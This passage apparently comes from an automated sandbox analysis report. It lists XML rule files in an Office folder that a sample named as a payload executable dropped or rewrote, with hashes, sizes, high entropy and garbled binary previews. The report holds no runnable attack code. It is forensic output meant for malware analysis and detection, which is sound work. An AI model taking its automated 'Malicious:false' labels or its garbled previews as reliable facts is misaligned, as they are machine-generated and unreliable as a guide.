                                                                                                                                                                      SSDEEP:24:D3zZpFawUsZf5pNDl6jSDAr3jjcwlEc+Lb+SnERgP3K1/uoQwiLgCp+Wo2bD:T/Uszpr2PrTgwl/+2yEeCntiLgzAD
                                                                                                                                                                      MD5:65FDC48B27229D034EA285EF2F6DF461
                                                                                                                                                                      SHA1:018B27B4BAFE32D17A334137658CC3B37E0C47EB
                                                                                                                                                                      SHA-256:19DF0BC8FF18117FA086DB9355FEACB9AB61486D0162EEE9792689ADEBC1965A
                                                                                                                                                                      SHA-512:BA25BAAD453F97824E5B0C8871DC2BEE782F6B8A55279780E51E4265789EBB51D248930846FC963F3B3E349F717A822A56EC7307BA5C50F5036596C872BB8A29
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlJ5 ...,M..............+..|=s.La"...$.AJ:...-(FI......(1..e].+..&....&.J....X..a. ..G.Z..t.9....e.WFj ...j.../U...`..t..T..8....{SpH.C..;o.@...L.1p...q..z..l...0.3S.. ..t...j....W..1........E.".}?B.;...n...8...Z.j...8;...&Lo..1....'|NL0.X4J.M...CNR...-...9[fQ..N.oo.&.....K.h...0.Y...$....vA.2....{..X.m.X}n.43.e.F...M.d+UA2.p....\.Z...Q...-.......6.E.....4.*..F.......;{.a.Khd..#.X..7.~e...s.7._.(y5.m..h...j.-..8.f........'.\.{..B6w.[:..<.*g..+m..k'.%3...;...h...7.5[.n.O.>%W.....~f.0p..28.T.U.u..c.G.......i.....].D.V..C.bly-.^.5M9.3........z..P...b.5A.....2..z....-*.:.*.O.w.X.G..M9m(.9.VcXgz...@......../e..n....44.[...~.....a|......=L.5..l`..T.0P...oe...W.<js....m....+.../T.(.8'.S....q..+x...h.SB.....l..q....-t%+#.D8-|W.5...v^.FO..b4v.6.^.S.$.pa...JHtV....9.PX...}(......9b'G.*..S.)$.+.na.{.<y.jx...k2....0.uZ.E|s.G$..G2V..}.......T..8..U.Nc*..onvH...........>....Udc..2D&.~.}.....0..P.._.S.....V..;.s......2wy.#....aN.Gl9N....+E.7.)

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700500v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1701
                                                                                                                                                                      Entropy (8bit):7.874590466460595
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:b51BNyxwmcsbbTYsaMr2hyfQ0B8VzXQZzG8DANQont9D:bXyxwmcaTT2sf6E6pNQoP
                                                                                                                                                                      MD5:FD85702FFA761545D33C4F0DD0181B42
                                                                                                                                                                      SHA1:211E8A7433845E701BC0A801D95F061E0C46FC75
                                                                                                                                                                      SHA-256:86E4FE2760120D75CC5EFBCB7D5F1F50EFF5E5A8CDBC8C63A76839D559EA097F
                                                                                                                                                                      SHA-512:5DC2C97109B784BB42460D05D2183C6C75C1B62849E3F87F3B4775E0293733355D710B36F685330ADAF9F5C96D5CAC2DC71EC793E2E5226CC18DC57375C91C87
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml._.FG;..s7....9([\.3.5.......)}kY.).!yx6.H..e.+.1..h..N..o..P.v.R....x.B4...Z..s..^R.....n#.sQ.........IS.).)(.._..X...AC.|....a..,...^.q.p%..|P.]...L../...FB.zX...>..B."2.)...Q/.#.....7*...%..............E/&j.9o....*g..Q....*.b...z.#R.e......:...............sB..B#.R_.R..N.TA}:[...h.. .}q..D;..'.('u.(.}m....0R.`....5j'...<qY.=p......&....?y..G.>..pmj...^X.T.......m..."lW7..u.|.b...../m.*....g.=....E....6.....o?.... .p^.o..}.......3.[l`-....).......G.$.....K........j.w..,i..#,.y........8E.j..Yz:d.P.;..j...OW...OsB..&."......rv. ....q...AYQ.Yk.*+7.....*l.H.n.7...a$..V...#.-...I.2..,...'$K1..Xw.....e.<....bW.Q\.3.4.......[.O.q]..A*{...."6~Z......3.y.D....F..:i.p.7..........T.....#:....n...Kx0.Mbb6g..U.Q...By.y.........",.......V...B]..y.+.o..K..........f.i.1..KA7]niy.@....c....yV.RK......8...#...)E....t.......U....B..v.!.(i..|...a.N.Yo.G...-......5....(.......CL.....?.t_...Y.:...HnY(...B.0!.z...+.....03....p?..l....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700501v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1738
                                                                                                                                                                      Entropy (8bit):7.877844004316152
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:wh9oql+nO6PiIzJgm8ctAVzfPkLgqLFKTk1Q67XnDD:hqG+m8KSzfPHqLETq3bP
                                                                                                                                                                      MD5:4491819BD885055E8B39269E3B009416
                                                                                                                                                                      SHA1:7F32720579B31F4A863C4F66D81468126D68021C
                                                                                                                                                                      SHA-256:CA8F187352DF4E7005365A0AEC1D19395A5C8793D80B55822A35661AA225A2FD
                                                                                                                                                                      SHA-512:5F7C8B1E1FCA968682D44617F83B32091F7D084825A084F476EDCC52CB80569CB3CD35469888F0E171A6B0FFFB33B3B6EAA7154F7F8254781356830DD41925CA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..yl..Q..6.67w...>..~e+.l..2..o..0.R...HmA.....A....H9.J..hr....B...}..&.%*#....J}`.(...._r.,.&e..Q{'.M.D..9.b.J..(....Y...#.c.5...@.+.,$O...B.^.V *!..?........:...OTd9..Z....}.../..m..gG.(...'nwROj|.@M..0.><e........#.V....e.<.^..0@...D..VN.L..p(..t j'..E...neqPb+.(......1..9.X..ET.CZY.q;\.b*.4...W<<h.....x3.%...k..<t..I..O..8...Bs.W~e.6Z........uUt.G..}........Ru...T<.D<#.I...M....|s.1.....X[^...V......(.s..W.....-!.[.<.K..c.[.i..<...<8`..`J..z.`.mg.u..>O..L...G1.&)*.......7.(...A_/...dX.....:..5*....$.8[.g....qsA..h.;.TY....y.g.=...z8rq..'....._....V....e{Jj.$H.)...-.z....k.Uu...N.OzK...S. %....x.B.... .5...,.k.....#u.i.....t...+9F2...OB.=.P8GK."C.-....=...J(.....=.E.v.-..s...z@W........}.hXK_.Uu.[..`...(.V.r._.3.#...p....&.h...I..hxy#+.....Q5"T"......tk.....W...W.6h.K6.9l..$=..%..\...?...w.yI.......$#..#3.oKt...X2......:.{....}W{. +....H...o[[s.Ug.......X..;.*t...2.../.Z.....$.....RH.3....?2H<!............6q.o.#.d.2_".'..m.R....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700550v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1689
                                                                                                                                                                      Entropy (8bit):7.872667360462618
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:yWE4hnV/p8Hz5DmIWCCYk9tBE9kR5VwE4DiMO9/d1dD:yWE4hpy5DmIWLVnmY5D8q/db
                                                                                                                                                                      MD5:047EAF3BF15D90117219F1434D79FEC9
                                                                                                                                                                      SHA1:9F6B041ADC1ECC29BA8636B2D6EE764171370FE4
                                                                                                                                                                      SHA-256:6041C5C8E32845849946C4E3D1B2630B99859F760A01833E88A7C8567623F230
                                                                                                                                                                      SHA-512:D13551AC6CA473B87E15A784E41A608009AC671EF6522DFAF50ECD812B6F4BE1C2CB87CE3BB12CF108354F045A892CC2B421C40D522A5A062A4645663BFFCB40
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlI.].....h8........|.J0..ht.....l..o\U$;_^X...$uI......T6.R...yz....1BDNs....0n...s^....k.1....zd.5Y....b@w....w.3.C~...+@.z.......g..5.@..,..&.$yAZ.=.b.a......^g........k....0...........).....S......R..z.q{...T.._...6z.<...oB.<.O..ex*...TOZ%0.Jd..)......F...M.....o.u8.3.mv.34.H.4.).{.]..eY4.o................a%...Bg<9....9;...*......n....-...n ....G..A`.L.......bvb.."...z^]..G.u..8..$a.xq.Pmt..I....;0.%.......g.d..KZZe.5:.mJ.a.a...t......YTv..N<...fS...B.Xr..#=:...$1....I{....r..&..a.._.bX......a.....;cA....Q...h...`M.)p.....CZ..be.,jO,..=I.Ws.^.._U..E...N.z.Sp..Q..n.4..wO#/sM.C.px....X...9.8.M./.V..u.v.u........*8..........~.jM.HO.C..s,..H.`S.../.8Mh......X.kA?%dg..1......'.l...'2....Q....X.+...$.p..J.uq.h}.".*.IN1Q.u...k<.a<.A.d!. .T...U......{%B./E....C...0\^..S..d~$%p..`..3l..O.TS}.6U.k...%..T{...Mu..HD..L....V..}.<V..5w..}[.~......].r_.SDO.K...g.W....n6.....`.'.?.y................)Q..n.:h.+..0...}.B..Ya4./3.lEt.XV)tk.?.4.+..v.0

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700551v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1726
                                                                                                                                                                      Entropy (8bit):7.8962204954125355
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:niFlQWMXBKvXrabz7Eg3qJ/4neS/xKaRHgTyKD:n8TMXQEzwgw4eS/MAgTv
                                                                                                                                                                      MD5:742FE4518DDE9884B202DAE3025788FB
                                                                                                                                                                      SHA1:063805E7186CB62F6553F0BD9C843F3D4500D0C7
                                                                                                                                                                      SHA-256:35640671923CD7815DB5B63570E78C8EB950952F22F47F9E6437953CFFD0BA11
                                                                                                                                                                      SHA-512:4840F81CA7F33FA60E18E4880499068BBB75B29695976BEE3F571621698D5925DBDD75E7117AEA2EA9D7C14D8B62BC8368C64A1DE086F5CA6029BCE2FBA5B4DC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.>..r...'{...k...W.`...I.w..!......B..j......e...^,..&5....7...W.............&....?$..d.......T:2...S.x......c..aSR...[....F3.k .ng....x....Z`/L...d.@......{-.*TA.$.{...buq.YU....*9_.,V.l....4.....iz......m...mU......J...j...X..M...>9......h..c^..nN.Yp..-..f..(x..t1.+.............G..[<..ak..!.u.c......Go.3A _..w.._(@..v...\.z.%....NBs.;.NE(..G.q.....[....$.O.z%..W..yz.O.y...!c.B..C...).,..(..3.='..."o..i.*.Qu.!Rd..S.=.`..z~r.F.w..f..u...&`.@.BqEh/..6)..?.w.$....B..Y3a....f.....7...&FY.H...,..@...;.I..A=.....`U.%k.............j...'.(...]..Z...T.I".l..7.}J;...P.B.@...<..p.......n..w..|/...y..@..T...,....%+c.X.f.O...1.%.....#.!...|.>.8.md.....0.b'.r .:...c.......@.V.....*.*...i.#.. u.....J.u..kN..O...Q.SS.N..MY...XG..@Zb..%..R. Xp.{..g.V..$q.`...8...E...v.t.v..........}.i.).y..pl.ie.D...`.F..'k.-..j..7...K. X*`.d6.S..:.UO......."w...<.".J.7...tFK.$s....._.e.N.F.X.....L....&.y.....N..q.zH...+.KBX$.<./.B..|.Z.Mp......b.2...I.+..YPE....G.o

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700600v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1697
                                                                                                                                                                      Entropy (8bit):7.886243749913368
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:p0LqEVxEftadlQHRkUKcMayAVU/lOtPfiKQRk+5jK6D:pmVxzg2YVU/lgPfiN5jJ
                                                                                                                                                                      MD5:73642337254AB1031F6E7E4512888F8B
                                                                                                                                                                      SHA1:8582B07F13892CEE42C63BB26ADD9C29DBB69A36
                                                                                                                                                                      SHA-256:2A3E75CF42402A63F58F35297B677BB47F50BC61F2AF3DD7019EC83C2F9DE00E
                                                                                                                                                                      SHA-512:6F41969D0E4DD6128BA5FFF070EF8AF82C094A08926806A7BA53AD78717AD52A6AE82B37D878754C8A3979336DC4AA3D2B4F79258E9574AF095AAF8C5636EF1D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.>W)x.$..1.....'Nv...|.;.f1}.M!. .{.PX."._..g..\.?Y.N.........g".o`.@A..M1FQ.sE.4/lO.:dn|.....Tr:.9..,..&3..?LR..T.[.!..Fh.A..........$.p,;OZr...4J....{..@.A1U...0...:..@}T.aM..........Q.l.mag..{...c..'........U..9V.I..T...e.....?b..n....`.....:E..].>..?+5."1..."...`.&....,D{.._..Jh....Sw.8.v...4..$?8.gr.G..jV.Kl...,.7l.....r.U.Lx.w...m%g.b.,.34S-.1...Z..t......x.{.z....,...C.zt.l..H...A.x...>.z.jd....Q......z...Jj..CX..F{.t........5.s.9..L...?..[... ...Pd=0..^t...~.sd....5./SK.#.{jH(.r.?.1...-..k..#8~c.o%v6.g..Q..po.n@.._G.U5f.a.Y.'^Mr..6..R..e..:.$....X...k.....s...W...]..J]..c..<s8.f.Q..O.ebc.)z..^.5..yt..M.#.C......d....<...D..%.U.i..p.....&..._......Bi..W{NiIc.<....|.q...B.`..5?...9h..L?..Vh7..s!n.M.....v.o=.....j...]D3..I..<a{.2.>%.%.w...br.P.P.8'.mU...C.M.8.=...9..j.......2.....2Q0.L....K..e*.Z..?..-......[.+...T$..M..FU..*.N...0.o.5..H.U*.]...N}=.M.t.0.!.l;.....}..'..0.j...8.?...2...ft$>fr.......a.u.B...i.J..Z./..y....l....n.V

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700601v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1734
                                                                                                                                                                      Entropy (8bit):7.90197249028914
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:x//RcrIHuf+vrOR5fZSWt6WuFP0rHjtf2gTrP2tQJrINnlaKE0B6388pZ+snDai9:xnkIHufGcuFP2DtftTz7ZUE4+8maIXLD
                                                                                                                                                                      MD5:07E7F0B864CE22F65DAB9486464859FE
                                                                                                                                                                      SHA1:F1FAFA2CB3946D8853D2A30FFF5870BFFFD09026
                                                                                                                                                                      SHA-256:E624876BCA50F14F7BBEA10FB4927CE34673AFAD13F99418CD99CE0DBCC77916
                                                                                                                                                                      SHA-512:D4846DDBCB4A01E390A2E046037ECFB3FD7BFEE4506CDEC38F8DF8DBEA02B120E76C1FBCF6AFAD874178C43327477B65CE0F48F4BE7A5A79D64019AA36C7C7A2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..~..X-hv;......[.B...K.I...@&c.f.a.......h...*...t.../...)...T..MD...y.h...A...=ud.......D$..F../V..Z...Zm .p..ys..P..K..E..(q..[.....R<......2.....N&S...q..mq...c..N|F.9.x..w...0...w.<.".*DK,?...{.X...'.#a. &.]\.$..p..O.1.i....w.ORzB.b.".......E[X....*.*..g.+.wdq..Y...g3\./.o.u5.%.v.........5...%f..d.,....w%"..M...9....$t......ld-...n....#.G....B..Y.".w.f.M .Bl...._O.[.t..B..L..?'.......xA...*.#...>n.)5jx.E.1s.jb.&i2..$p#5....EkR}.H4.#......?7.Q.......@....#|..0.$...C6..F..`..Y.........+=c.x.P..tW...ORn...3....s2.......d.f..eKA.{......^..}08.+.v?...}.......k.....e.....<..~c.W`C.v{^.j.N?.!..2..^*:J..I..4..{........7.....C.._q.>83;q4.....kO:.V.&..=...h..|i[..@oc.o....{.h...a.....'.)~+....$jf...{../..N..y...X....H..8..(iP..|..ZL=.W...*+..M.0s....Qi.MM7R..93}G..?(.$.4.?.N3...z..0..t..!\.6..9u......[.n...Yi.K.a.{... ....9......^>.kQ.>..*....#..e..j..uK..i....<.....&.P.."J8{...;h..G.y../0..........jK.c...IH.l....=.F.D..&;.....5V.IG.....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700650v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1695
                                                                                                                                                                      Entropy (8bit):7.843265461185019
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:gou1Dpn8RuBhs35Ix1vGmrmbIeImnzSMe7M10k0D:sauBK5I6mMILAmMe7Kg
                                                                                                                                                                      MD5:A27F1CCF3F9CAF580D048E0AB326D310
                                                                                                                                                                      SHA1:9DA65C9DBC993F487A9BF6D1150FB4BB897CBED8
                                                                                                                                                                      SHA-256:87B1A3F8D790BB8C4D6B72AF94841DED4C5D23979A51AD8BFB09E74A37F1A433
                                                                                                                                                                      SHA-512:D721AD6647753AE2356D2290E930D345DF8273E11BC68A6F9B4B63A92CA5511BABC7301A50D2E5E858467B64C29EBCFBC478AA0C8917958427FAB63C7DF2588D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlN..}..x.~.....K..]..]{...'L..3Va...j...-8.}?.9!.lb>.T......Gb.9.f....8c4.y...e..b{[...........o.......F<.....r.'.....*..K..`....;.....F......K...X.....i..p...`.!.{.tq*./.}..C..vmxH.(.qj/....B..m.4....k.mR.c.yr.g...*..{....Y$y..AX@...y...fW.....;..&...D6.;.o..$.*$i~)...........8.S....1.x....~......u..m.'f....yJ~....L....W...}.F>.,.n..T.....+n..A.f..L-.`..Tg..a..x...Ud..'..(..).....s.(...%.g.p.|o......WcfT............`.c|-....N.#....>l.F*..#o..s.k..aV..LI..qN]..7.....#S..)4C..."%l;.8/I.Al..|.|..?.R."P....t.`....xX...zpR....X..5. .....h..L.F...(.;]2.......@.....o.u;.-.W..j<....xM.7..........~.a.=`pm.4...oJf.....K....,...!f....x....a..'N.....LL6f?..t8.^..D.p..)6..fp...wO.....];H.(u.L.kXF.6.MT......M$X..O.(..n..iT.)/3..U.....p(b.t.$4Q..o.~N.9.....]..4..4..^..u.RK.]..Hg...,#y..ZGF2.-]..u.x.C^....8..^4...@.M.....l...I.y...1..I.'.;[..>....j.<.e.2...c3..B.'.........L......$=*...$....i....AA..f.e.j~..-:........."........~..C<_.4....c;Q..M..b

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700651v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1732
                                                                                                                                                                      Entropy (8bit):7.893062906079982
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:zJt24HlxYgXgETgf2xKLq1y34i73Y8wCxdJETHD:zJxFygyfwaUl/wLq
                                                                                                                                                                      MD5:323BD1FFBB35E271674781560FCBECB8
                                                                                                                                                                      SHA1:2DBA995B4D7D8EBFD3FBE3FC0EE7556922FFE92F
                                                                                                                                                                      SHA-256:9AD979EC03A86AD5813525795EDC092E3809B617E978914D590786EDEA303B36
                                                                                                                                                                      SHA-512:B5D611FE7404DE0C5162C24D0063165815F2940BF9224134354A130A73DC6DD1802CF4D0DF60F67F05E2C0CBCAD366C960EA040D5E519A8EEF3A36EFB5C83178
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..4J.t..;.)6&R.......&.~..j..0...xo."....jN.....(.....b....j...7_#.....,._^.........[.p.F?...@..k...^F....z(.K...~.~...8$..R.~.f...d.........@.g...D.W...../*.....?..:..........J..8.?.)....$9....4..\.6zNL..N.7"......s.m..>.ki....b^:.W(.~_..x(.'j:..Y.,.!...Q......c.? ..;.C..p..7...8..k.V_.g.R...7 ..........t...ssX......~..|..3.;.r4._."....*.\.y.....t.nU........wB.r..q.2e..........+:5.|j2....p.DYc7.q...y"....Lb.GB..!\.....|L.<.*t.+]_....A.V...).3r.....q .4.....H.......TC'..Jnk_.^.{,.D..g..w..eE...=..#.c.....c.N..6....%e..ahnf.Y..x6_.9.S..G<..._...`.....6..=..s..O..xT...Rv..R.Co".....jB....|&..<...y.##h....u4..T.[..y..&..2..2>f.o.j|(..{...].e.(K'[eeq..DV.Y...........55...o..I.....9.u.D.V..`..K.`..F..*..9..u...mX..IZ..O.8B....._..i.....l!...Zkp...[,j...c.7s.Tr}.*+.~Bz6HVe.5r......u..{.O8..l.N.%.....8.....M.M.....owCX g.C.2....Q.'..P...V.x...|..o\%..X'.@B..=.Y.R....6(......Y.?u6.5. .>.....8.i....>..]S......o(:.....2....b.8..U..^..]

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700700v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1697
                                                                                                                                                                      Entropy (8bit):7.8765556555203355
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:ZTd2+aMT1ei1bVs9uken7Bnxza5eAH1KfcgMD:Vd2+aMhPbVZNnJWeAMf6
                                                                                                                                                                      MD5:F4E335A9C4DB5BE50386E81A75F7B012
                                                                                                                                                                      SHA1:28784156231453737747FC2B536B0CC4E95F09F0
                                                                                                                                                                      SHA-256:EA69D05879165FB883234775C92B876744B394421C9120CA285BC0E1E712C39F
                                                                                                                                                                      SHA-512:79EE05419143306AEE9AD04A3B466573C00CEB89701CB55DA0A1BC4824406697EF3719925A6D8D1B3BA2900E06AE0877C8AF1FF97CADBCA8D371F4615B11C78C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..AE..L.%.u..|....n..`.5z.H.1......-..:..?.|O+..f.4.-....,...>.......M.l.........=.46..@.............>%.R....,...z.y....<j..2...gT)4..0.F...4"..DW+|n..7iM5F"!..hG...e..L.....d.BT).L..J.!.Nu[.....N.8..Q4#..pDg.Y2......L.U.1$.......S..V3..:..u.e.@.).tn..M.B.L......S..u.5j......."D..xnH....b...-$?.F;......'...Lw+.h.s.U,)~5...Q........:.@/......`.p.Y.!.."...n.nI....<..8R....x;>{..Xn..=.>V..*..v.0%.H&...e?+.oR....wYN...j..%..y..}T.)....<1.M.... .p.d.r..Zj.......?.....w..b..<j;.>.jf.t&..sE. m.$..fz..........fa..J...*..{..:..L.}o..VP.5.d.3D..`.*.!$...q.2H...,...?c.Cn...6.y.C.9..m.;....%Tf...).Z.aK.o..S...E`!~..*')6....E...M.K......^.6F.'|....$./p{.C.{..e..t.A...t..g.:(,V.Y_Z..A....9.H\..j..x..=..f.T............s..W.O..]..O[G..N.70tV...q...=}s..9.5..ox.$..6...P..|`...0C<...T...*x6R"...+..H...I....|ace....<.hN...@.....d.).1a....9D.\.`O.4..L.?.$..|.....E.fb.|.5.C...B2.:R.)T.@.e.BO.....S.m.Y..q....d.B...{.Y.....Z..0.t...oI..-$..G.dY

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700701v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1734
                                                                                                                                                                      Entropy (8bit):7.888459540399249
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:DOUGshW+3PCQ4B08Z6bKp5yPT3YzlbObaXWGEASlD:BBB4B08IlT8lHQASd
                                                                                                                                                                      MD5:10246A27A705CF72015A0049654854AB
                                                                                                                                                                      SHA1:672EF3066A001E75B4B17F3225238EC45B6EA348
                                                                                                                                                                      SHA-256:DE1E10D402AAF0C8311273B61DF94EDEE7239F5F8013C4785C45EAC8C687A69F
                                                                                                                                                                      SHA-512:970764AF3482F9DB6130496EFAC3854E919F87D3BC426A833A8A74AC3CFBB8FAE62101DFBF2D15A2E8827E7EFFD77B45607A8E1756DE030E9DC22FCCAC39725F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlRO.._...d6~.FYN.Dg.).....{@..'..0..I(}......acj.r...1..{...cE.P....b..t.T...A15...k... .8.;.d.... 1=.1..9.Fc..L!.....?Lg..f*.~..Ue....O....Z..~Y......Uc...;A.J!b ..9I...I..E..#..F.=j..;....s..+.Q.{..5.D....,.!...ER.bNG.0.Pq.L..T.b.~...Q.=...(L..&RI/:...eg|....I.Str.B.....].[....{/.....f.I..`.&.'....#D....#A..+.{E..'M9...Cu..S.Hr.Mo0 .!A.D...*......_..+.G..>f..Y'..R./.&<.6.?.|.......y.1r..A.....2_..(n.Y..U..,e.k\..,.....Up.....>....,}X....}El..+eU..G....XQ(j-.X...p....2..0.Yj?....[.p...MnY.`Y...:9.o...m...[.Bd.i.."{..K.$l.>....c................,..F.!...oQb.<...cu..v.>..H`..._......f#..J.......&.b.6S..C.....#Z.b.!..yp......@...x"(.....2}.B...\........1.n.~..S.o.l~.N..G.A.O$.K.`_.[W..........)-O...:9..a......r.2~..H..d.z........J-^.'......H.....r/~X.F.|..~.G>;.i.%J.L..._4R.....}b.H.f/.t3....l.tB.*+.DW..d6 .1..1.^...C.......Y$f.f..gG9.r......BLwM...U.~o1..~C...W...n.+N.....[..~T..n..@.!..}.....4.*f~..LnW...2.y.Oa.E..h..$..<._^Qj..O

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700750v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1710
                                                                                                                                                                      Entropy (8bit):7.872326223156149
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Gbmy2NhUYwh6sAHd3Qa+ESHNn0UBFq2INEldjsEde1NTn5DFf7ZQqZSmwmi6rZEQ:sGSzAsoQaSmC/IEdwEq5xF+BH6NEZWD
                                                                                                                                                                      MD5:805C45AF4D16665F6F4A0077F99EB359
                                                                                                                                                                      SHA1:801CD9C4CDEB0204D80E3C109A7C21B72AAF9736
                                                                                                                                                                      SHA-256:9059925AC985C96712DA496DB4A01C93C1CBE299D608BBB782921FA4753A676B
                                                                                                                                                                      SHA-512:3DCD95C23FF59892312DC2C21BEA58632E6E000E950E229CE5CF42089FC93835B59038FFAFD70138652D766F47FA8239B82DD3A8899C6ED1A479C147487E0066
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.kR...w#.=....c?.#../..U...d.D...lc... ...P.<c..*...`.H".qL.;..0....].....6v.2.m.....d....9...t.kW.d.j...4J..d=.T.]S..7.O.!;.&..7y.."::i.|...c.D.!.9.j..).."......H.=`..,v.[.$...=JL.f/'. \....J.#..-...l4..Y...S.f:...P.Z.5.....R...jF..T...w..7P..D"v....8...@........x....[~..s..M.7..Z.+..%..K........l.i`.@#V.n...Z:.e..T.....o..oY.>.8P...|9D..........}..ia2..,Z.)...^.-.v........`.gcG.X..9.M../.....P`.'n...j~...... .o..O.T..P....%.J?..X.*...j2..G..tI.?....L.....G...\....Pc...N:.}#.h.=0. .W..p..SF..).`y.?b..1..,G!.(..l#kR..fx.N..V...l=.......G.....p....o.G......3|U...48t..p..V..K....B-..?8^....G.....1"....9a.a.(PE.M.6.....Q&.....0.,.Lg.a.m~.~t...T......KN.2.qUt4...M_.0.....!x...!X......g.=.E..5:%....~.........P...M}.D.p.P.d...-..mq....vz..3.........|.............~..0.f...4....%..C .\..OG!.e.....%.....e\..3.t.Y.@..D.bf].+..N.@D#.GT..H... .MJD?V2.e`F1....E...P...w.......Xj...R\I.RtZ.\..v....[.H..q.i.Y.-.....!.v.;]s..w.....V.4.?G|7....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700751v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1747
